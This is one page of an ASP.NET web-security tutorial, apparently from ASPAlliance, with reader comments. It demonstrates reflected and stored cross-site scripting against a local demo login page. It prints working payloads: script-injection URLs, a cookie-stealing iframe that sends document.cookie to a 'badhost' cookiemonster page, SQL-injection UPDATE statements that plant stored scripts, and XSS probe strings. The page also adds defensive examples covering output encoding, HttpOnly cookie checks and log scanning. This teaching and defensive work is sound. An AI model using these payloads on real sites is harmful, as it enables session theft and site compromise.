SQL Injection and Cross-Site Scripting
page 5 of 9
by Bryian Tan

Cross-Site Scripting (CSS/XSS) Attack

Definition: Enables malicious attackers to inject client-side script or HTML markup into web pages viewed by other users.

Let's say we have a login page that displays an error message for every unsuccessful attempt. The error message is passed in the query string of the URL and later displayed in a Label control. See figure 11.

Figure 11

Consider this scenario: an anonymous user sends you an email with the following content:

Listing 18

Dear Admin,
There is problem with the login page: 
http://localhost:1234/Sample/LoginPage.aspx?strErr=%22%3E%3C%73%63%72%69%70%74%20%
73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%6
2%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E
%3C%2F%73%63%72%69%70%74%3E   

Or

"There is problem with the login page http://localhost:1234/Sample/LoginPage.aspx" 
with the URL pointing to the above link.

Part of the URL is percent-encoded (each character written as a hexadecimal byte value). When decoded, it becomes:

Listing 19

http://localhost:1234/Sample/LoginPage.aspx?strErr=">
<script src="http://localhost:9997/badhost/maliciousscript.js"></script>  

If we let our guard down and click the link in the email, the browser executes the malicious script. Execute the URL and you should see a pop-up message. Shown below is a script embedded in the query string to steal browser cookies.

Listing 20

http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%76%61%
72%20%73%3D%27%3C%49%46%52%41%4D%45%20%73%74%79%6C%65%3D%22%64%69%73%70%6C%61%79%3
A%6E%6F%6E%65%22%20%53%52%43%3D%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6F%73%74%3A
%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%63%6F%6F%6B%69%65%6D%6F%6E%73%74%65%72%2E%
61%73%70%78%3F%63%3D%27%2b%65%73%63%61%70%65%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6
F%6B%69%65%29%2b%27%3E%3C%5C%2F%49%46%52%41%4D%45%3E%27%3B%64%6F%63%75%6D%65%6E%74
%2E%77%72%69%74%65%28%73%29%3C%2F%73%63%72%69%70%74%3E

When decoded, it will look like:

Listing 21

http://localhost:1234/Sample/LoginPage.aspx?strErr=<script>var s='<IFRAME 
style="display:none" 
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c='%2bescape(document.cookie)
%2b'><\/IFRAME>';document.write(s)</script>
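As an added example (not code from the article or its sample project), the Python below percent-decodes the Listing 18 URL the way the server does, then contrasts pasting the value straight into the Label markup with HTML-encoding it first. The same encoding step is what keeps the value that Listing 25 later stores in MyComments.Name harmless when ListComments.aspx renders it. The `<span>` wrapper stands in for the Label control's output and `html.escape` for `HttpUtility.HtmlEncode`; both are assumptions of the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlsplit

# The URL from Listing 18 (line breaks removed), as it arrives at LoginPage.aspx.
LISTING_18_URL = (
    "http://localhost:1234/Sample/LoginPage.aspx?strErr="
    "%22%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F"
    "%6C%6F%63%61%6C%68%6F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F"
    "%6D%61%6C%69%63%69%6F%75%73%73%63%72%69%70%74%2E%6A%73%22%3E%3C%2F"
    "%73%63%72%69%70%74%3E"
)

# The value the UPDATE in Listing 25 writes into MyComments.Name (the stored case).
STORED_NAME = '<script src="http://localhost:9997/badhost/maliciousscript.js"></script>'


def query_params(url):
    """Percent-decode every query value, which is what Request.QueryString hands the page."""
    return dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))


def render_unsafe(value):
    """Models Label.Text = value: the raw string is pasted into the HTML response (assumed markup)."""
    return f'<span id="lblErr">{value}</span>'


def render_encoded(value):
    """Models HtmlEncode before assignment: <, >, &, and quotes become character entities."""
    return f'<span id="lblErr">{html.escape(value, quote=True)}</span>'


class TagCollector(HTMLParser):
    """Records the start tags a browser would build from the markup it receives."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    """Parse the rendered fragment and return the element names found, in order."""
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def is_inert(value):
    """True when encoding leaves only the wrapper element, i.e. the value injects no tags."""
    return tags_in(render_encoded(value)) == ["span"]


if __name__ == "__main__":
    reflected = query_params(LISTING_18_URL)["strErr"]
    print("decoded strErr:", reflected)
    print("unsafe render tags :", tags_in(render_unsafe(reflected)))
    print("encoded render tags:", tags_in(render_encoded(reflected)))
    print("stored Name inert after encoding:", is_inert(STORED_NAME))
```

The parser run shows the difference concretely: the unsafe render yields a real `script` element, the encoded render yields only the wrapper, so encoding at output time covers both the reflected strErr value and anything read back from the database.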

The script embeds an IFRAME in the page pointing to http://localhost:9997/badhost/cookiemonster.aspx with a query string parameter "c". This parameter carries the cookie values created by the "SQLInjection_XSS_Demo" application. To demonstrate this, I created a few cookies on LoginPage.aspx. The cookiemonster.aspx page records all the cookie names and values in CookieJar.txt.

Listing 22

    // Demo only: issues two plain cookies and sets no HttpOnly flag, so page script
    // (including an injected one) can read them through document.cookie.
    void FakeCookies()
    {
        Response.Cookies["email"].Value = "bryian.tan@mydomain.com";
        Response.Cookies["email"].Expires = DateTime.Now.AddDays(1);

        Response.Cookies["age"].Value = "22";
        Response.Cookies["age"].Expires = DateTime.Now.AddDays(1);
    }

 

After executing the above URL, we will see the entries below in CookieJar.txt.

 

Figure 12

So what? What is the attacker going to do with my cookie information? Let's say the page stores some information in the cookies after a successful login attempt. Log in using one of the usernames found in the tbl_users table, then refresh the web page. The page will pull some information from the cookies and display the results on the page. See below.

 

Figure 13
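The cookies above are readable by the injected script only because nothing marks them HttpOnly. As an added example (not code from the article or its sample project), the Python below audits Set-Cookie headers for the HttpOnly, Secure and SameSite attributes, lists which cookie names page script could read through document.cookie, and produces hardened headers. The two headers are constructed to match the cookies FakeCookies() issues; the Expires date is invented for the example.

```python
# Set-Cookie headers constructed to mirror FakeCookies() from Listing 22.
# Values come from the listing; the Expires date is made up for this example.
DEMO_SET_COOKIE = [
    "email=bryian.tan@mydomain.com; expires=Wed, 15-Sep-2010 20:21:24 GMT; path=/",
    "age=22; expires=Wed, 15-Sep-2010 20:21:24 GMT; path=/",
]

# (lower-cased attribute name as it appears in the header, attribute text to add when missing)
PROTECTIONS = [
    ("httponly", "HttpOnly"),
    ("secure", "Secure"),
    ("samesite", "SameSite=Lax"),
]


def parse_set_cookie(header):
    """Split 'name=value; attr; attr=value' into (name, value, {lower-cased attr: value})."""
    parts = [part.strip() for part in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def missing_protections(header):
    """Names of the protective attributes the header does not carry."""
    _, _, attrs = parse_set_cookie(header)
    return [attr.split("=")[0] for key, attr in PROTECTIONS if key not in attrs]


def script_visible(headers):
    """Cookie names document.cookie would expose: everything not marked HttpOnly."""
    names = []
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if "httponly" not in attrs:
            names.append(name)
    return names


def harden(header):
    """Append whichever of HttpOnly, Secure and SameSite=Lax the header lacks."""
    _, _, attrs = parse_set_cookie(header)
    extra = [attr for key, attr in PROTECTIONS if key not in attrs]
    return header + "".join("; " + attr for attr in extra)


if __name__ == "__main__":
    for header in DEMO_SET_COOKIE:
        print(parse_set_cookie(header)[0], "missing:", missing_protections(header))
    print("readable by page script:", script_visible(DEMO_SET_COOKIE))
    hardened = [harden(h) for h in DEMO_SET_COOKIE]
    print("readable after hardening:", script_visible(hardened))
```

In ASP.NET the same result comes from setting HttpCookie.HttpOnly = true on each cookie (or httpOnlyCookies="true" in the web.config httpCookies element). HttpOnly stops document.cookie from reading the value, so the cookiemonster payload collects nothing, but it does not stop an injected script from sending requests with the cookie attached; it complements output encoding rather than replacing it.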

 

Update table with malicious script

We already know the table and column names from the previous example. Execute the URL shown in Listing 23 to update the MyComments table with JavaScript that tampers with the cookies: the stored script writes a further script tag into the cookie value. Then navigate to the ListComments.aspx page to trigger the script, and navigate back to LoginPage.aspx. You should see a popup message "XSS from bad host", which indicates that the script was executed by the browser.

 

Listing 23

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Comment = %27<scriptc="\<script 
src=\">http://localhost:9997/badhost/maliciousscript.js\"><\/script>"; 
document.cookie = "email="%2bc;</script> test %27 WHERE id =1 --

Let's append some malicious script to the MyComments table. Execute the URL shown below.

Listing 24

http://localhost:1234/Sample/ListComments.aspx?cid=1 
%55%50%44%41%54%45%20%4D%79%43%6F%6D%6D%65%6E%74%73%20%53%45%54%20%4E%61%6D%65%3D%
27%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6C%6F%63%61%6C%68%6
F%73%74%3A%39%39%39%37%2F%62%61%64%68%6F%73%74%2F%6D%61%6C%69%63%69%6F%75%73%73%63
%72%69%70%74%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%27%20%2D%2D

When decoded, the URL becomes:

Listing 25

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Name='<script 
src="http://localhost:9997/badhost/maliciousscript.js"></script>' --

Refresh the page and we will see the popup message shown below. This indicates that the malicious script crafted by the attacker was executed by the browser.

Figure 14

The URL shown below will embed an HTML IFRAME in the page and trigger the cookiemonster.aspx page every time a user navigates to ListComments.aspx. Execute it, navigate to the ListComments.aspx page, and observe that new entries are appended to the CookieJar.txt file without any trace or warning message.

Listing 26

http://localhost:1234/Sample/ListComments.aspx?cid=1 UPDATE MyComments 
SET Name= '<script>var s="<IFRAME style=display:none 
SRC=http://localhost:9997/badhost/cookiemonster.aspx?c="%2bescape(document.cookie)
%2b"><\/IFRAME>";document.write(s)</script>' --

Quick test

Append any of the strings below to the URL of a web page that takes parameters. If you see a pop-up message, the web page is vulnerable to Cross-Site Scripting.

http://localhost:1234/Sample/LoginPage.aspx?strErr="><scrIpt>alert("XSS")</scriPt>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=</TITLE><sCRIPT>alert("XSS");</SCRIPt>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr=<BODY%20ONLOAD=alert("XSS")>
 
http://localhost:1234/Sample/LoginPage.aspx?strErr="><iFRAME%20SRC="javascript:alert('XSS');"></IFRaME>
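Turning the quick test around for the defender, here is an added example (not from the article) that scans access-log lines for the probe shapes shown above, percent-decoding the query string repeatedly so double-encoded variants are caught too. The log format (date, time, method, path, query, status) and the lines themselves are constructed for this example, and the three regular expressions are heuristics chosen here, not a published signature set.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines: date time method path query status. Not captured from the demo app.
SAMPLE_LOG = """\
2010-09-14 20:21:24 GET /Sample/LoginPage.aspx strErr=Invalid+password 200
2010-09-14 20:22:01 GET /Sample/LoginPage.aspx strErr=%22%3E%3CscrIpt%3Ealert(%22XSS%22)%3C/scriPt%3E 200
2010-09-14 20:22:30 GET /Sample/LoginPage.aspx strErr=%3CBODY%20ONLOAD=alert(%22XSS%22)%3E 200
2010-09-14 20:23:05 GET /Sample/ListComments.aspx cid=1 200
2010-09-14 20:23:40 GET /Sample/LoginPage.aspx strErr=%22%3E%3CiFRAME%20SRC=%22javascript:alert('XSS');%22%3E%3C/IFRaME%3E 200
2010-09-14 20:24:12 GET /Sample/LoginPage.aspx strErr=%253Cscript%253Ealert(1)%253C/script%253E 200
"""

# Named heuristics for the probe shapes in the quick test: tag smuggling, inline event
# handlers, javascript: URLs. Deliberately broad; tune them against your own traffic.
PROBES = [
    ("tag", re.compile(r"<\s*/?\s*(script|iframe|body|title|img|svg)\b", re.I)),
    ("event-handler", re.compile(r"\bon[a-z]+\s*=", re.I)),
    ("javascript-url", re.compile(r"javascript\s*:", re.I)),
]


def decode_fully(text, max_rounds=3):
    """Percent-decode repeatedly so double-encoded probes (%253C -> %3C -> <) are seen too."""
    for _ in range(max_rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def flag_line(line):
    """Return (path, decoded_query, [probe names]) when the query looks like an XSS probe, else None."""
    fields = line.split()
    if len(fields) < 6:
        return None
    path, query = fields[3], decode_fully(fields[4])
    hits = [name for name, pattern in PROBES if pattern.search(query)]
    return (path, query, hits) if hits else None


def scan_log(log_text):
    """Run flag_line over every line and keep the flagged ones."""
    return [hit for hit in map(flag_line, log_text.splitlines()) if hit]


if __name__ == "__main__":
    for path, query, hits in scan_log(SAMPLE_LOG):
        print(f"{path}  {hits}  {query}")
```

The ordinary error message and the plain cid=1 request pass untouched, while the four probe lines are reported with the heuristic that fired; feeding real logs through this is a cheap way to notice that someone is running the quick test against your pages.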


User Comments

Title: SQL Injection and Cross-Site Scripting   
Name: DINESH
Date: 2011-01-18 6:25:25 AM
Comment:
The best SQL Server Site Scripting
Title: avrail   
Name: Refat Eid
Date: 2010-09-19 3:02:00 AM
Comment:
Where can I find the TestDBSetup.sql?
Title: Really Good   
Name: Ankit Shivankar
Date: 2010-09-15 1:04:32 AM
Comment:
It's really good... and easy to understand.

Dear Bryian...
I'm facing some problems in my personal project; can you help me?
If you can, please contact me at my mail id, which is shiva.ankit@gmail.com
Title: Download Link   
Name: Bryian Tan
Date: 2010-09-14 8:21:24 PM
Comment:
Hello,

Sorry, I think I forgot to include the download link. Anyway, please download the sample code from here http://download.ysatech.com/SQL-Injection-and-Cross-Site-Scripting/Sample_SQLInjection_XSS.zip
Title: Gustavo   
Name: Fernandez
Date: 2010-09-14 3:19:45 PM
Comment:
Where is the link to download the code sample (TestDBSetup.sql)?
Title: Senior programmer/analyst   
Name: Greg Hilsheimer
Date: 2010-09-14 2:16:39 PM
Comment:
Where is the link to download the code?






©Copyright 1998-2024 ASPAlliance.com